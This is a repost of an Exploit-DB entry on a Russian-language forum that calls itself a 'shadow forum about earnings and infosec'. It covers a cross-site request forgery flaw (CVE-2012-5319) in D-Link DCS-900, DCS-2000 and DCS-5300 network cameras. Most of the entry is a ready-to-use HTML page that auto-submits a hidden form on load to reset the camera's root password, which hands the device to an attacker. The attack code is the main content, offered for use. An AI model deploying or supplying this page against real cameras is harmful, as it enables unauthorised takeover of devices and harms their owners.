D-Link DCS - 'security.cgi' Cross-Site Request Forgery | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 36877

Проверка EDB

Пройдено

Автор: RIGAN IIMRIGAN

Тип уязвимости: REMOTE

Платформа: HARDWARE

CVE: cve-2012-5319

Дата публикации: 2012-02-23

D-Link DCS - 'security.cgi' Cross-Site Request Forgery

HTML:

source: https://www.securityfocus.com/bid/52134/info

The D-Link DCS-900, DCS-2000, and DCS-5300 are prone to a cross-site request-forgery vulnerability.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

This issue affects D-Link DCS-900, DCS-2000, and DCS-5300. 

<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://www.example.com/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>
</form>
</body>
</html>

Источник: www.exploit-db.com

Поиск

Exploit D-Link DCS - 'security.cgi' Cross-Site Request Forgery

Exploiter

Похожие темы